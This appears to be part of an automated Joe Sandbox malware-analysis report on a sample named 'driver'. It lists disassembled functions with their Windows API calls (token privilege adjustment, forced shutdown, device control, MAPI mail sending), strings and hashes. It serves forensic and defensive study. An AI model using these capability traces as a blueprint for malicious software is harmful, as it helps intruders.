                                                                                                                                                                    • Instruction ID: 5357eebf88c3649602d9b81743c960e038c775a2401a260577a32c446b542e9e
                                                                                                                                                                    • Opcode Fuzzy Hash: f93ad5f00a56466d27291db40c1105638db8132c28aa5f83f4a226fdc7faddfc
                                                                                                                                                                    • Instruction Fuzzy Hash: 18A001A358862819980532F67A0B669265C8D5923CB643B4BF678955D39A1E92A000AA
                                                                                                                                                                    Function 00403C50 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileTime
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1425588814-0
                                                                                                                                                                    • Opcode ID: 10c5ad27d158e09c54c2b0f9a575e50574357b58b5b9d0f2e138edb7a428843c
                                                                                                                                                                    • Instruction ID: 480212039a05bd7c9bd338a6304b6f42ef47d520c682fd92d0048fc48fb76b2c
                                                                                                                                                                    • Opcode Fuzzy Hash: 10c5ad27d158e09c54c2b0f9a575e50574357b58b5b9d0f2e138edb7a428843c
                                                                                                                                                                    • Instruction Fuzzy Hash: 57A0243100010C33C5003D43DC01C057F1C47103547004033F50C150134533F57050FC
                                                                                                                                                                    Function 0040A3F0 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e6178abcf550df711b942c24ed5513d671b2df0842c36697f96d38e5593f1f42
                                                                                                                                                                    • Instruction ID: 28af2d548417cb90318a78e78be5a24f5bfdf0e4422bbed620f7f76308dbfbbb
                                                                                                                                                                    • Opcode Fuzzy Hash: e6178abcf550df711b942c24ed5513d671b2df0842c36697f96d38e5593f1f42
                                                                                                                                                                    • Instruction Fuzzy Hash: 4EB0027D500240DEEA055B61CA49D6539D7BF88205BCA84F5510419176C6FB45756644
                                                                                                                                                                    Function 0042E764 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 514040917-0
                                                                                                                                                                    • Opcode ID: 6cea29abdddd0eaa4863cf0fdaf9a3d76c0e04e73c30807386b59328d0b384ba
                                                                                                                                                                    • Instruction ID: 6745df87795036e4aceb540ab297f32aa59f114bfe3801ef60c61e07686f0419
                                                                                                                                                                    • Opcode Fuzzy Hash: 6cea29abdddd0eaa4863cf0fdaf9a3d76c0e04e73c30807386b59328d0b384ba
                                                                                                                                                                    • Instruction Fuzzy Hash:

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 0042FB20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000020,?), ref: 0042FB40
                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000020,?), ref: 0042FB46
                                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 0042FB68
                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,SeSecurityPrivilege,?,00000000,00000020,?), ref: 0042FB80
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,SeSecurityPrivilege,?,00000000,00000020,?), ref: 0042FB89
                                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 0042FBA4
                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,SeRestorePrivilege,?,00000000,SeSecurityPrivilege,?,00000000,00000020,?), ref: 0042FBBC
                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,SeRestorePrivilege,?,00000000,SeSecurityPrivilege,?,00000000,00000020,?), ref: 0042FBC4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Token$AdjustLookupPrivilegePrivilegesProcessValue$CloseCurrentErrorHandleLastOpen
                                                                                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                                    • API String ID: 2567606174-639343689
                                                                                                                                                                    • Opcode ID: cc28d337ff00705da8a6d2100022d5f998fd7d921fb1591795d0009a6ace2962
                                                                                                                                                                    • Instruction ID: 5fce6bc17b829f910f9a5b663651000b88d7bd723a9666a8c941faf5b8d02798
                                                                                                                                                                    • Opcode Fuzzy Hash: cc28d337ff00705da8a6d2100022d5f998fd7d921fb1591795d0009a6ace2962
                                                                                                                                                                    • Instruction Fuzzy Hash: AF1177707407047AFF10EBA1DD17FAE7A689B01B05F64057AB900A91C2DBE86A14876D
                                                                                                                                                                    Function 004029D0 Relevance: 11.7, Strings: 9, Instructions: 442COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: %.1d$%02.2d$%03.3d$%04.4d$%05.5d$.rar$U$mAD$yyyymmddhhmmss
                                                                                                                                                                    • API String ID: 0-3758361825
                                                                                                                                                                    • Opcode ID: 986c2465420071e9bed7232bd195c9c8712ad08e9ecd263567237119869eb7e8
                                                                                                                                                                    • Instruction ID: 5128fa1aec446f2210cee8b180d94936cb9f31faaf036eb43d30a238817db45b
                                                                                                                                                                    • Opcode Fuzzy Hash: 986c2465420071e9bed7232bd195c9c8712ad08e9ecd263567237119869eb7e8
                                                                                                                                                                    • Instruction Fuzzy Hash: 8FF12575D001589EDF21DB64DC85BEE7B76AF51308F1440FAE848B22C2DBB85E84CB59
                                                                                                                                                                    Function 0040C734 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32shutdownCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040C740
                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 0040C746
                                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040C75A
                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,00000028,?), ref: 0040C77C
                                                                                                                                                                    • ExitWindowsEx.USER32(0000000D,80000000), ref: 0040C788
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                    • API String ID: 1314775590-3733053543
                                                                                                                                                                    • Opcode ID: 123a323f6ac28e08a82d9991813b3fa806ca13fed06188cecc37be41c64b8044
                                                                                                                                                                    • Instruction ID: 466795fce0247fb390653b16d954a236cbf355b73f5757a51b44bdf710f34aca
                                                                                                                                                                    • Opcode Fuzzy Hash: 123a323f6ac28e08a82d9991813b3fa806ca13fed06188cecc37be41c64b8044
                                                                                                                                                                    • Instruction Fuzzy Hash: 98F03770A80709B6F710EFD18C47FAE7368AB40F09F60425DBA04791C1DBF96B048669
                                                                                                                                                                    Function 004042E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000), ref: 00404310
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 00404321
                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 004043C0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressDiskFreeHandleModuleProcSpace
                                                                                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                    • API String ID: 1197914913-3712701948
                                                                                                                                                                    • Opcode ID: fd047fd1d9ebee0ef75babebfca81ce818ab2df2e4dd0e1600d4d597ebb41744
                                                                                                                                                                    • Instruction ID: 048fc90b96a017cffd3fe76efa305b98d6673b75bdb101493c107acdbf8aaf7b
                                                                                                                                                                    • Opcode Fuzzy Hash: fd047fd1d9ebee0ef75babebfca81ce818ab2df2e4dd0e1600d4d597ebb41744
                                                                                                                                                                    • Instruction Fuzzy Hash: CA3130B0E001199FDB14DFA5CC81AEFB3B5FB88304F449566E904F6284E7789E45CB58
                                                                                                                                                                    Function 0040710C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OemToCharBuffA.USER32(?,?,00000000), ref: 004074E5
                                                                                                                                                                      • Part of subcall function 0040BB80: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,01000000,?,?,0040F758), ref: 0040BB8F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Char$BuffByteMultiWide
                                                                                                                                                                    • String ID: $$5$CMT
                                                                                                                                                                    • API String ID: 2262112766-658447730
                                                                                                                                                                    • Opcode ID: cb7cd55a5d43c693da1c2a815f3714ad67e42c66a20270f54cb53d7c412fcc6a
                                                                                                                                                                    • Instruction ID: ce0824a874b4fca01fb6e9de787ce8ccaf41b76f9049c4fbf4548387fa2a27ac
                                                                                                                                                                    • Opcode Fuzzy Hash: cb7cd55a5d43c693da1c2a815f3714ad67e42c66a20270f54cb53d7c412fcc6a
                                                                                                                                                                    • Instruction Fuzzy Hash: E6B1E870E082545BEB10EF65CC817EE77A6AF44304F1844BBF804AA3C6D67CAE45D76A
                                                                                                                                                                    Function 00433310 Relevance: 5.4, Strings: 4, Instructions: 427COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: %5lu %16s %8s %3d%%$%5lu %16s %8s %3d%%$ $ %s
                                                                                                                                                                    • API String ID: 0-3451817315
                                                                                                                                                                    • Opcode ID: e2224f92d93e7a2ed97efcdc57712e13ef81087dea712b4eced9d2fe8f31a6cd
                                                                                                                                                                    • Instruction ID: 54e96ac53fdc970f60703759630a14186cf26e47bd77425ea5450595b5f91763
                                                                                                                                                                    • Opcode Fuzzy Hash: e2224f92d93e7a2ed97efcdc57712e13ef81087dea712b4eced9d2fe8f31a6cd
                                                                                                                                                                    • Instruction Fuzzy Hash: 82F12770A00244AAEF25EFA9C8467EFBBB5AF0831AF14546FE440623C2C77D5B44CB59
                                                                                                                                                                    Function 00404B5C Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(?,00000003,00000003,00000000,00000003,0A000000,00000000), ref: 00404B8B
                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 00404BC0
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000003,00000003,00000000,00000003,0A000000,00000000), ref: 00404BC8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 33631002-0
                                                                                                                                                                    • Opcode ID: 5975044f2c35300187c1d3e6ba3e988b4878f27a0b34f5beb12bdfe7df36fbd6
                                                                                                                                                                    • Instruction ID: fbc0f6e024eea5a60f2d426c68613503534581971991a1cd9b4a516a491b43cd
                                                                                                                                                                    • Opcode Fuzzy Hash: 5975044f2c35300187c1d3e6ba3e988b4878f27a0b34f5beb12bdfe7df36fbd6
                                                                                                                                                                    • Instruction Fuzzy Hash: A001D661A9030875FB3096A48C83FDAB2AC9B00B50F1005A6B711BE1C1E9F96F844398
                                                                                                                                                                    Function 0040C2EC Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 286libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryA.KERNEL32(MAPI32.DLL,00000000,?,?), ref: 0040C303
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MAPISendMail), ref: 0040C31B
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MAPIResolveName), ref: 0040C329
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MAPIFreeBuffer), ref: 0040C337
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,MAPIFreeBuffer,00000000,MAPIResolveName,00000000,MAPISendMail,MAPI32.DLL,00000000,?,?), ref: 0040C352
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                    • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                                                                                                                                    • API String ID: 2449869053-4165214152
                                                                                                                                                                    • Opcode ID: 04728af1b7ce35ff8c496aa90801d98255ca0388ebb8e5f23e39d044600f552c
                                                                                                                                                                    • Instruction ID: 9e55febb8d385b1fcfc27abd2b6b267e7da5bdb159ae5b9f5860c9a0bc18ca42
                                                                                                                                                                    • Opcode Fuzzy Hash: 04728af1b7ce35ff8c496aa90801d98255ca0388ebb8e5f23e39d044600f552c
                                                                                                                                                                    • Instruction Fuzzy Hash: A8B1B031900618EBDB20DF65DC81BEFB7B4AF48305F1441AEE509762C1DB79AA84CF98
                                                                                                                                                                    Function 0042BC1C Relevance: 15.1, APIs: 10, Instructions: 60COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,?,00000002,?), ref: 0042BC2C
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,000000F6,?,00000002,?), ref: 0042BC35
                                                                                                                                                                    • GetConsoleMode.KERNEL32(00000000,?,000000F5,000000F6,?,00000002,?), ref: 0042BC46
                                                                                                                                                                    • GetConsoleMode.KERNEL32(00000000,?,00000000,?,000000F5,000000F6,?,00000002,?), ref: 0042BC50
                                                                                                                                                                    • SetConsoleMode.KERNEL32(00000000,00000002,00000000,?,00000000,?,000000F5,000000F6,?,00000002,?), ref: 0042BC58
                                                                                                                                                                    • SetConsoleMode.KERNEL32(00000000,00000003,00000000,00000002,00000000,?,00000000,?,000000F5,000000F6,?,00000002,?), ref: 0042BC60
                                                                                                                                                                    • ReadConsoleA.KERNEL32(00000000,?,?,?,00000000,00000000,00000003,00000000,00000002,00000000,?,00000000,?,000000F5,000000F6,?), ref: 0042BC72
                                                                                                                                                                    • OemToCharA.USER32(?,?), ref: 0042BC80
                                                                                                                                                                    • SetConsoleMode.KERNEL32(00000000,?,?,?,00000000,?,?,?,00000000,00000000,00000003,00000000,00000002,00000000,?,00000000), ref: 0042BC89
                                                                                                                                                                    • SetConsoleMode.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,?,?,00000000,00000000,00000003,00000000,00000002,00000000), ref: 0042BC92
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Console$Mode$Handle$CharRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 717309600-0
                                                                                                                                                                    • Opcode ID: 6a10ad7c35421c0ab4ff765f6b11e19f7eb0c2893a54487e5cb4d90714995ef8
                                                                                                                                                                    • Instruction ID: 4fa39f3eef919790b77caa3ed6b0c62de04243d9117f8b3ca5cfeccc9565292a
                                                                                                                                                                    • Opcode Fuzzy Hash: 6a10ad7c35421c0ab4ff765f6b11e19f7eb0c2893a54487e5cb4d90714995ef8
                                                                                                                                                                    • Instruction Fuzzy Hash: 43018261A042147AF712EFB58C82EFFB6BC9F45B69F10425EF514A6182DB7C4F0143A9
                                                                                                                                                                    Function 0043AC50 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(borlndmm), ref: 0043AC73
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,@Borlndmm@SysGetMem$qqri), ref: 0043AC88
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,@Borlndmm@SysFreeMem$qqrpv), ref: 0043AC95
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,@Borlndmm@SysReallocMem$qqrpvi), ref: 0043ACA2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
